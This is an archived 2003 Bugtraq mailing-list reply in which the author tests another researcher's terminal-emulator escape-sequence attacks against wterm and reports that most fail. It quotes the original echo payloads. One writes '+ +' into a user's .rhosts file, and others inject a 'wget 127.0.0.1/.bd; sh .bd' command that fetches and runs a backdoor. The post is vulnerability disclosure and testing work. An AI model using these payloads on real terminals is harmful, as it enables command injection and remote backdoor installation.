[29040] in bugtraq
Re: Terminal Emulator Security Issues
daemon@ATHENA.MIT.EDU (Juraj Ziegler)
Tue Feb 25 12:49:11 2003
Date: Tue, 25 Feb 2003 01:23:09 +0100
From: Juraj Ziegler <e@hq.sk>
To: H D Moore <termulation@digitaloffense.net>
Message-ID: <20030225002309.GA25687@hq.sk>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="gBBFr7Ir9EOA20Yy"
Content-Disposition: inline
In-Reply-To: <200302241502.52947.termulation@digitaloffense.net>
--gBBFr7Ir9EOA20Yy
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Wterm was not mentioned throughout the article, so I decided to test it
quickly.
On Mon, Feb 24, 2003 at 03:02:52PM -0600, H D Moore wrote:o
> $ echo -e "\ec+ +\n\e]<Code>;/home/user/.rhosts\a"
Does not work. Code 33 is not implemented, according to the
documentation, code 50 is used to change font [specifying movement in
the terminal's font list].
> $ echo -e "\e]2;This is the new window title\a"
Works.
> $ echo -e "\e[21t"
echo -e "\e]2;whoo\a"
echo -e "\e[21t"
Changes window title to 'whoo', but nothing is pasted -> does not work.
> $ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress=
Enter>\e[8m;"
It can be deduced that this does not work either, and a quick test
proved it.
> $ echo -e "\eP0;0|0A/17\x9c"
Safe from this harm, over here.
> $ echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]=
\a\e]10;[show]\a"
Besides of a weird output from echo itself [as no all characters where
handled by the terminal], nothing.
The output is: :]itd
As to wterm's origin, it seems to be based on rxvt
<quote site=3D"http://largo.windowmaker.org/files.php#wterm">
wterm started as a beta test of some additions Alfredo hoped to get
contributed to the official rxvt source tree.
</quote>
Version tested: 6.2.9 - latest (even though released in 8/2001)
[e]
--=20
___________________________________________________________________________=
____
>e@hq.sk< /(bb|[^b]{2})/ >http://hq.sk/~e=
uro<
"always know what you say, but do not always say what you know"
--gBBFr7Ir9EOA20Yy
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQE+WrdtWGpO+XKsHY8RAvyxAKDR76QsE1+3ze8hZ+M/qmZrL+Oe9ACgkUrM
AFqo8DOtN05yHtapBR3i1bY=
=KI7N
-----END PGP SIGNATURE-----
--gBBFr7Ir9EOA20Yy--
